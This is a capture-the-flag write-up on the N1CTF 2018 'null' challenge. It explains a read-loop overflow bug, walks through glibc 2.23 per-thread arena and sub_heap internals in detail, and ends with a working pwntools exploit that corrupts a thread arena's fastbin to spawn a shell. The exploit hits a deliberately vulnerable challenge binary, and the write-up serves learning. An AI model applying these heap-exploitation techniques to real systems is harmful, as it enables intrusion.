n1ctf null + rctf many_notes + some research of pthread heap
I've noticed something about how I do challenges... once I run into a problem I can't solve, I can't even find the bug in the challenges released after it...
Rctf_2019 many_notes
During the contest I couldn't even find the vulnerability... I get nervous in scenarios I haven't encountered much...
While reproducing it afterwards I found in Balsn's writeup that this challenge seems to originate from
N1ctf_2018 Null
so I went and did Null first.
After the contest the bug was pretty clear... in the end I just haven't done enough challenges and my knowledge is too narrow.
I'll use this challenge to expand my skill points around thread_heap.
[*] '/home/n132/Desktop/null'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
PIE is not enabled.
The main thread's logic is simple: after you send the "ready" input it sleeps 3 seconds, spawns a new thread, and then the main thread waits for that thread to exit.
There are three menu actions, but add is the special one: the whole challenge format is pretty fresh, effectively there is only add, just like /dev/null, a black hole...
I didn't spot it during the contest... looking at the challenge afterwards with a clear head, I realized that since the operations are so limited, the place most likely to go wrong is the input routine...
for ( i = 0LL; ; i += v3 )
{
  result = i;
  if ( i >= len )
    break;
  v3 = read(0, &a1[i], len);        // BUG: still asks for len bytes, should be len - i
  if ( v3 <= 0 )
  {
    write(1, "I/O error\n", 0xAuLL);
    exit(1u);
  }
}
The usual way to write this loop subtracts what has already been read (i.e. passes len - i, or does len -= v3 after each read), but here it doesn't. So if we send len-1 bytes on the first read and up to len more bytes on the second, the second read starts at offset len-1 and we overflow the buffer by roughly len bytes.
For example:
from pwn import *   # add()/cmd() are the menu wrappers defined in the full exploit at the end of this post
p=process('./null')
p.sendafter("assword: \n","i'm ready for challenge\n")
add(0x88,0)
cmd(1)
p.sendafter("Input: ","A"*0x87)
p.send("A"*0x87)
gdb.attach(p,'thread 2')
p.interactive()
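For comparison, a non-vulnerable version of that loop would shrink the remaining length on every iteration. A minimal sketch of my own, not taken from the binary:
#include <unistd.h>
/* only ever request the bytes that are still missing */
static ssize_t read_exact(int fd, char *buf, size_t len)
{
    size_t i = 0;
    while (i < len)
    {
        ssize_t n = read(fd, &buf[i], len - i);   /* len - i instead of len */
        if (n <= 0)
            return -1;                            /* I/O error or EOF */
        i += n;
    }
    return (ssize_t) i;
}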
Virtual memory can be allocated in two ways (brk and mmap). My own informal understanding: for efficiency, the allocator reserves a large allocatable region up front.
Allocation regions are split into the main arena and sub arenas (this improves multi-threaded performance: if all threads shared one region, each allocation would have to wait for other threads to finish, for safety).
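A quick way to see the split (a minimal demo of my own, not part of the challenge): an allocation from the main thread comes from the brk heap managed by main_arena, while an allocation from a new thread comes from an mmap'd sub_heap managed by a per-thread arena, so the two pointers land in very different address ranges.
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>

/* compare where malloc'd memory lives in the main thread vs. a worker thread */
static void *worker(void *arg)
{
    (void) arg;
    void *p = malloc(0x20);                 /* served by the thread's own arena (mmap'd sub_heap) */
    printf("thread malloc: %p\n", p);
    return NULL;
}

int main(void)
{
    void *p = malloc(0x20);                 /* served by main_arena (brk heap) */
    printf("main   malloc: %p\n", p);

    pthread_t t;
    pthread_create(&t, NULL, worker, NULL);
    pthread_join(t, NULL);
    return 0;
}
Compile with gcc -pthread; the main-thread pointer is typically a low heap address while the worker's pointer sits near the libc/mmap region.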
So let's look at the structure of an allocation arena. It's actually a very commonly used structure... main_arena is exactly this structure: malloc_state
struct malloc_state
{
/* Serialize access. */
__libc_lock_define (, mutex);
/* Flags (formerly in max_fast). */
int flags;
/* Set if the fastbin chunks contain recently inserted free blocks. */
/* Note this is a bool but not all targets support atomics on booleans. */
int have_fastchunks;
/* Fastbins */
mfastbinptr fastbinsY[NFASTBINS];
/* Base of the topmost chunk -- not otherwise kept in a bin */
mchunkptr top;
/* The remainder from the most recent split of a small request */
mchunkptr last_remainder;
/* Normal bins packed as described above */
mchunkptr bins[NBINS * 2 - 2];
/* Bitmap of bins */
unsigned int binmap[BINMAPSIZE];
/* Linked list */
struct malloc_state *next;
/* Linked list for free arenas. Access to this field is serialized
by free_list_lock in arena.c. */
struct malloc_state *next_free;
/* Number of threads attached to this arena. 0 if the arena is on
the free list. Access to this field is serialized by
free_list_lock in arena.c. */
INTERNAL_SIZE_T attached_threads;
/* Memory allocated from the system in this arena. */
INTERNAL_SIZE_T system_mem;
INTERNAL_SIZE_T max_system_mem;
};
The main arena and the sub arenas form a singly-linked circular list; the next field points to the next arena.
To figure out the rules of thread memory allocation we still have to read the source; heap allocation starts from __libc_malloc.
//glibc2-23
void *
__libc_malloc (size_t bytes)
{
mstate ar_ptr;
void *victim;
//PART1 check the hook
void *(*hook) (size_t, const void *)
= atomic_forced_read (__malloc_hook);
if (__builtin_expect (hook != NULL, 0))
return (*hook)(bytes, RETURN_ADDRESS (0));
//PART2 get arena
arena_get (ar_ptr, bytes);
//PART3 do _int_malloc
victim = _int_malloc (ar_ptr, bytes);
/* Retry with another arena only if we were able to find a usable arena
before. */
//PART4
if (!victim && ar_ptr != NULL)
{
LIBC_PROBE (memory_malloc_retry, 1, bytes);
ar_ptr = arena_get_retry (ar_ptr, bytes);
victim = _int_malloc (ar_ptr, bytes);
}
if (ar_ptr != NULL)
(void) mutex_unlock (&ar_ptr->mutex);
assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
ar_ptr == arena_for_chunk (mem2chunk (victim)));
return victim;
}
The 2.23 version is still pretty approachable... it mainly does the following: check __malloc_hook, get an arena via arena_get, then call _int_malloc, which holds the actual heap-allocation logic, and finally retry with another arena if that failed.
Part 2: in a single-threaded program this simply returns main_arena. This time it is a multi-threaded program, so let's follow it and see how it is implemented. These macros are defined in glibc/malloc/arena.c:
#define arena_get(ptr, size) do { \
ptr = thread_arena; \
arena_lock (ptr, size); \
} while (0)
#define arena_lock(ptr, size) do { \
if (ptr) \
__libc_lock_lock (ptr->mutex); \
else \
ptr = arena_get2 ((size), NULL); \
} while (0)
...why is everything in libc written so oddly.... DO + WHILE(0) (the do { ... } while (0) wrapper is just the standard trick that makes a multi-statement macro behave like a single statement).
These two macros roughly mean: find the current thread's arena and lock it; if the thread doesn't have one yet, get one via arena_get2.
//glibc/malloc/arena.c
static mstate
internal_function
arena_get2 (size_t size, mstate avoid_arena)
{
mstate a;
static size_t narenas_limit;
a = get_free_list ();
if (a == NULL)
{
/* Nothing immediately available, so generate a new arena. */
if (narenas_limit == 0)
{
if (mp_.arena_max != 0)
narenas_limit = mp_.arena_max;
else if (narenas > mp_.arena_test)
{
int n = __get_nprocs ();
if (n >= 1)
narenas_limit = NARENAS_FROM_NCORES (n);
else
/* We have no information about the system. Assume two
cores. */
narenas_limit = NARENAS_FROM_NCORES (2);
}
}
repeat:;
size_t n = narenas;
/* NB: the following depends on the fact that (size_t)0 - 1 is a
very large number and that the underflow is OK. If arena_max
is set the value of arena_test is irrelevant. If arena_test
is set but narenas is not yet larger or equal to arena_test
narenas_limit is 0. There is no possibility for narenas to
be too big for the test to always fail since there is not
enough address space to create that many arenas. */
if (__glibc_unlikely (n <= narenas_limit - 1))
{
if (catomic_compare_and_exchange_bool_acq (&narenas, n + 1, n))
goto repeat;
a = _int_new_arena (size);
if (__glibc_unlikely (a == NULL))
catomic_decrement (&narenas);
}
else
a = reused_arena (avoid_arena);
}
return a;
}
This involves get_free_list, defined as follows:
static mstate
get_free_list (void)
{
mstate replaced_arena = thread_arena;
mstate result = free_list;
if (result != NULL)
{
__libc_lock_lock (free_list_lock);
result = free_list;
if (result != NULL)
{
free_list = result->next_free;
/* The arena will be attached to this thread. */
assert (result->attached_threads == 0);
result->attached_threads = 1;
detach_arena (replaced_arena);
}
__libc_lock_unlock (free_list_lock);
if (result != NULL)
{
LIBC_PROBE (memory_arena_reuse_free_list, 1, result);
__libc_lock_lock (result->mutex);
thread_arena = result;
}
}
return result;
}
The gist: if free_list is non-NULL, attach that arena to the current thread and return it; otherwise return NULL.
I experimented along the way and found that after a thread exits, free_list points to that thread's arena:
n132>>> p free_list
$1 = (mstate) 0x7ffff0000020
It seems libc is quite frugal...
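The reason is the thread-exit cleanup: glibc registers a freeres hook that detaches the dying thread's arena and, once nothing is attached to it, pushes it onto free_list. Roughly (glibc 2.23 malloc/arena.c, quoted from memory, details may differ slightly):
static void __attribute__ ((section ("__libc_thread_freeres_fn")))
arena_thread_freeres (void)
{
  mstate a = thread_arena;
  thread_arena = NULL;

  if (a != NULL)
    {
      (void) mutex_lock (&free_list_lock);
      /* If this was the last attached thread for this arena, put the
         arena on the free list.  */
      assert (a->attached_threads > 0);
      if (--a->attached_threads == 0)
        {
          a->next_free = free_list;
          free_list = a;
        }
      (void) mutex_unlock (&free_list_lock);
    }
}
text_set_element (__libc_thread_subfreeres, arena_thread_freeres);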
So get_free_list just checks whether there is a reclaimed arena; if there is, reuse it, otherwise return NULL.
Back in arena_get2: if get_free_list successfully got an arena, it is returned directly.
Otherwise: "Nothing immediately available, so generate a new arena."
First it checks whether narenas_limit has been initialized; if not, it initializes it:
if (narenas_limit == 0)
{
if (mp_.arena_max != 0)//if mp_.arena_max is non-zero, use it as the limit
narenas_limit = mp_.arena_max;
else if (narenas > mp_.arena_test)//otherwise derive the limit from the CPU core count (or a default)
{
int n = __get_nprocs ();
if (n >= 1)
narenas_limit = NARENAS_FROM_NCORES (n);
else
/* We have no information about the system. Assume two
cores. */
narenas_limit = NARENAS_FROM_NCORES (2);
}
}
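For reference, NARENAS_FROM_NCORES is defined in the same file as below, so on 64-bit the default cap works out to 8 arenas per core (e.g. 32 arenas on a 4-core machine):
#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))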
Next:
size_t n = narenas;
/* NB: the following depends on the fact that (size_t)0 - 1 is a
very large number and that the underflow is OK. If arena_max
is set the value of arena_test is irrelevant. If arena_test
is set but narenas is not yet larger or equal to arena_test
narenas_limit is 0. There is no possibility for narenas to
be too big for the test to always fail since there is not
enough address space to create that many arenas. */
if (__glibc_unlikely (n <= narenas_limit - 1))
{
if (catomic_compare_and_exchange_bool_acq (&narenas, n + 1, n))
goto repeat;
a = _int_new_arena (size);
if (__glibc_unlikely (a == NULL))
catomic_decrement (&narenas);
}
else
a = reused_arena (avoid_arena);
Roughly: if the current number of arenas has not reached the limit, create a new one with _int_new_arena; otherwise fall back to reused_arena and wait for one.
reused_arena: at a quick glance, it starts from main_arena and try-locks each arena along next; if one lock succeeds it does detach_arena (replaced_arena) and attaches to that arena; if none of them can be locked, it blocks waiting on one.
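The core of reused_arena is roughly the following (trimmed and paraphrased from glibc 2.23, so treat it as a sketch rather than the exact source): it walks the arena ring round-robin with trylock, and only when every trylock fails does it block on one mutex.
  result = next_to_use;            /* static round-robin starting point */
  do
    {
      if (!arena_is_corrupt (result) && !mutex_trylock (&result->mutex))
        goto out;                  /* got an uncontended arena */
      result = result->next;
    }
  while (result != next_to_use);
  /* No arena available without contention.  Wait for the next in line.  */
  (void) mutex_lock (&result->mutex);
out:
  /* ... attach result to this thread, detach the old arena, advance next_to_use ... */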
_int_new_arena involves the heap structures, so let's first fill in the heap layout:
typedef struct _heap_info
{
mstate ar_ptr; /* Arena for this heap. */
struct _heap_info *prev; /* Previous heap. */
size_t size; /* Current size in bytes. */
size_t mprotect_size; /* Size in bytes that has been mprotected
PROT_READ|PROT_WRITE. */
/* Make sure the following data is properly aligned, particularly
that sizeof (heap_info) + 2 * SIZE_SZ is a multiple of
MALLOC_ALIGNMENT. */
char pad[-6 * SIZE_SZ & MALLOC_ALIGN_MASK];
} heap_info;
Compared with the mstate structure, heap_info is better at describing a single sub_heap: ar_ptr points to the arena of this heap, and the other fields describe the rest of the heap's state (previous heap, size, mprotected size)..
...Suddenly I got confused... why bother with a separate heap_info at all... isn't the arena enough to describe it...
I found the explanation on p4nda's blog: heap_info describes one sub_heap of a thread, there can be several of them, and they exist only in thread heaps.
sub_heaps exist because threads share the address space, so a single thread's heap space may not be contiguous;
a series of heap_info structures is needed to describe a thread's multiple sub-heaps, while the arena manages all of that thread's heaps.
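This split also shows up in how glibc maps a chunk back to its arena: because every sub_heap is aligned to HEAP_MAX_SIZE, masking a chunk address down to that alignment lands exactly on the heap_info at the start of the sub_heap, whose ar_ptr gives the owning arena (macros from glibc 2.23 malloc/arena.c):
/* find the heap and corresponding arena for a given ptr */
#define heap_for_ptr(ptr) \
  ((heap_info *) ((unsigned long) (ptr) & ~(HEAP_MAX_SIZE - 1)))
#define arena_for_chunk(ptr) \
  (chunk_non_main_arena (ptr) ? heap_for_ptr (ptr)->ar_ptr : &main_arena)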
In glibc/malloc/arena.c you can find several functions that operate on heaps: new_heap, grow_heap, shrink_heap, delete_heap...
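Before reading them it helps to know the two size constants they work with (glibc 2.23; DEFAULT_MMAP_THRESHOLD_MAX is 32 MB on 64-bit, so HEAP_MAX_SIZE works out to 64 MB, i.e. 0x4000000):
#define HEAP_MIN_SIZE (32 * 1024)
#ifndef HEAP_MAX_SIZE
# ifdef DEFAULT_MMAP_THRESHOLD_MAX
#  define HEAP_MAX_SIZE (2 * DEFAULT_MMAP_THRESHOLD_MAX)
# else
#  define HEAP_MAX_SIZE (1024 * 1024) /* must be a power of two */
# endif
#endif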
Let's mainly analyze new_heap:
static heap_info *
internal_function
new_heap (size_t size, size_t top_pad)
{
size_t pagesize = GLRO (dl_pagesize);
char *p1, *p2;
unsigned long ul;
heap_info *h;
if (size + top_pad < HEAP_MIN_SIZE)
size = HEAP_MIN_SIZE;
else if (size + top_pad <= HEAP_MAX_SIZE)
size += top_pad;
else if (size > HEAP_MAX_SIZE)
return 0;
else
size = HEAP_MAX_SIZE;
size = ALIGN_UP (size, pagesize);
//align size up to the page size
/* A memory region aligned to a multiple of HEAP_MAX_SIZE is needed.
No swap space needs to be reserved for the following large
mapping (on Linux, this is the case for all non-writable mappings
anyway). */
p2 = MAP_FAILED;
if (aligned_heap_area)
{
p2 = (char *) MMAP (aligned_heap_area, HEAP_MAX_SIZE, PROT_NONE,
MAP_NORESERVE);
aligned_heap_area = NULL;
if (p2 != MAP_FAILED && ((unsigned long) p2 & (HEAP_MAX_SIZE - 1)))
{
__munmap (p2, HEAP_MAX_SIZE);
p2 = MAP_FAILED;
}
}
if (p2 == MAP_FAILED)
{
p1 = (char *) MMAP (0, HEAP_MAX_SIZE << 1, PROT_NONE, MAP_NORESERVE);
if (p1 != MAP_FAILED)
{
p2 = (char *) (((unsigned long) p1 + (HEAP_MAX_SIZE - 1))
& ~(HEAP_MAX_SIZE - 1));
ul = p2 - p1;
if (ul)
__munmap (p1, ul);
else
aligned_heap_area = p2 + HEAP_MAX_SIZE;
__munmap (p2 + HEAP_MAX_SIZE, HEAP_MAX_SIZE - ul);
}
else
{
/* Try to take the chance that an allocation of only HEAP_MAX_SIZE
is already aligned. */
p2 = (char *) MMAP (0, HEAP_MAX_SIZE, PROT_NONE, MAP_NORESERVE);
if (p2 == MAP_FAILED)
return 0;
if ((unsigned long) p2 & (HEAP_MAX_SIZE - 1))
{
__munmap (p2, HEAP_MAX_SIZE);
return 0;
}
}
}
if (__mprotect (p2, size, PROT_READ | PROT_WRITE) != 0)
{
__munmap (p2, HEAP_MAX_SIZE);
return 0;
}
//a memory region has been obtained via mmap
h = (heap_info *) p2;
h->size = size;
h->mprotect_size = size;
LIBC_PROBE (memory_heap_new, 2, h, h->size);
//heap_info initialization done
return h;
}
It breaks into three parts: compute the size, mmap a region aligned to HEAP_MAX_SIZE, and initialize the heap_info at its start.
As you can see, in a thread the heap_info structure sits at the very front of a sub_heap.
A small experiment shows it:
n132>>> p *(struct _heap_info *) 0x7ffff0000000
$1 = {
ar_ptr = 0x7ffff0000020,
prev = 0x0,
size = 0x21000,
mprotect_size = 0x21000,
pad = 0x7ffff0000020 ""
}
n132>>> x/8gx 0x7ffff0000000
0x7ffff0000000: 0x00007ffff0000020 0x0000000000000000
0x7ffff0000010: 0x0000000000021000 0x0000000000021000
0x7ffff0000020: 0x0000000300000000 0x0000000000000000
0x7ffff0000030: 0x0000000000000000 0x0000000000000000
All in all, new_heap creates a sub_heap (and in the dump above you can also see the arena, ar_ptr = 0x7ffff0000020, sitting right behind heap_info at offset 0x20).
After reading p4nda's analysis of this function, I realized my own analysis was rather shallow...
The region the heap actually controls is not the whole area mmap'd in new_heap, for example:
0x00007fffe8000000 0x00007fffefff8000 rw-p mapped
0x00007fffefff8000 0x00007ffff0000000 ---p mapped
It only grows toward higher addresses when there is an actual need:
static int
grow_heap (heap_info *h, long diff)
{
size_t pagesize = GLRO (dl_pagesize);
long new_size;
diff = ALIGN_UP (diff, pagesize);
new_size = (long) h->size + diff;
if ((unsigned long) new_size > (unsigned long) HEAP_MAX_SIZE)
return -1;
if ((unsigned long) new_size > h->mprotect_size)
{
if (__mprotect ((char *) h + h->mprotect_size,
(unsigned long) new_size - h->mprotect_size,
PROT_READ | PROT_WRITE) != 0)
return -2;
h->mprotect_size = new_size;
}
h->size = new_size;
LIBC_PROBE (memory_heap_more, 2, h, h->size);
return 0;
}
Here the diff parameter is the increment. It is first aligned up to pagesize; if the current sub_heap still has room to expand, it is expanded (mprotect-ing additional pages when necessary) and the heap_info's mprotect_size and size are updated.
If it cannot expand (the HEAP_MAX_SIZE ceiling is reached), it returns -1. As far as I can tell, grow_heap is called from sysmalloc when a non-main arena's top chunk runs out of space.
Continuing with _int_new_arena: the function ultimately returns the new arena. The first part obtains a sub_heap via new_heap:
h = new_heap (size + (sizeof (*h) + sizeof (*a) + MALLOC_ALIGNMENT),
mp_.top_pad);
if (!h)
{
/* Maybe size is too large to fit in a single heap. So, just try
to create a minimally-sized arena and let _int_malloc() attempt
to deal with the large request via mmap_chunk(). */
h = new_heap (sizeof (*h) + sizeof (*a) + MALLOC_ALIGNMENT, mp_.top_pad);
if (!h)
return 0;
}
a = h->ar_ptr = (mstate) (h + 1);
malloc_init_state (a);
a->attached_threads = 1;
/*a->next = NULL;*/
a->system_mem = a->max_system_mem = h->size;
arena_mem += h->size;
/* Set up the top chunk, with proper alignment. */
ptr = (char *) (a + 1);
misalign = (unsigned long) chunk2mem (ptr) & MALLOC_ALIGN_MASK;
if (misalign > 0)
ptr += MALLOC_ALIGNMENT - misalign;
top (a) = (mchunkptr) ptr;
set_head (top (a), (((char *) h + h->size) - ptr) | PREV_INUSE);
LIBC_PROBE (memory_arena_new, 2, a, size);
mstate replaced_arena = thread_arena;
thread_arena = a;
mutex_init (&a->mutex);
(void) mutex_lock (&list_lock);
/* Add the new arena to the global list. */
a->next = main_arena.next;
/* FIXME: The barrier is an attempt to synchronize with read access
in reused_arena, which does not acquire list_lock while
traversing the list. */
atomic_write_barrier ();
main_arena.next = a;
(void) mutex_unlock (&list_lock);
(void) mutex_lock (&free_list_lock);
detach_arena (replaced_arena);
(void) mutex_unlock (&free_list_lock);
/* Lock this arena. NB: Another thread may have been attached to
this arena because the arena is now accessible from the
main_arena.next list and could have been picked by reused_arena.
This can only happen for the last arena created (before the arena
limit is reached). At this point, some arena has to be attached
to two threads. We could acquire the arena lock before list_lock
to make it less likely that reused_arena picks this new arena,
but this could result in a deadlock with ptmalloc_lock_all. */
(void) mutex_lock (&a->mutex);
This part of the code initializes the new arena and links it into the list right after main_arena.
To sum up: a thread's sub_heaps are chained together through their heap_info structures; the thread holds one arena that manages all of its sub_heaps, and suitable chunks are looked up inside those sub_heaps.
The key: the two structures heap_info and mstate.
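Putting it together, the layout of a freshly created non-main sub_heap looks like this (my own summary of the code above):
/*
 *  sub_heap base (aligned to HEAP_MAX_SIZE, obtained by new_heap via mmap)
 *  +0x00   heap_info      { ar_ptr, prev, size, mprotect_size, pad }
 *  +0x20   malloc_state   (the thread arena: mutex, fastbinsY, top, bins, next, ...)
 *   ...    top chunk      (right after malloc_state, suitably aligned; chunks are carved from it)
 */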
Source is the best teacher.
Back to the challenge. With the background above, combined with the conditions we already have, the challenge suddenly doesn't look that hard: we can overflow len bytes past a chunk on the thread heap, so we can:
from pwn import *
def cmd(c):
    p.sendlineafter("(0/1): ",str(c))
def add(size,pad,c=""):
    p.sendlineafter("Action: ",str(1))
    p.sendlineafter("Size: ",str(size))
    p.sendlineafter("blocks: ",str(pad))
def pad(n,m=1000):
    for x in range(n):
        add(0x4000,m)
        cmd(0)
context.log_level='debug'
p=process('./null')
p.sendafter("assword: \n","i'm ready for challenge\n")
pad(12)
pad(1,260)
add(0x4000,1)
cmd(1)
p.sendafter("Input: ","A"*0x3fff)
p.send("A"+"A"*8+p64(0x21)+'\x00'*0x10+p64(0)*4+p64(0x0000000300000000)+p64(0)*5+p64(0x60202d-0x10))
add(0x68,0)
cmd(1)
p.sendafter("Input: ","/bin/sh".ljust(11,'\x00')+p64(0x000000000400E4D).ljust(0xff,'\x00'))
p.interactive()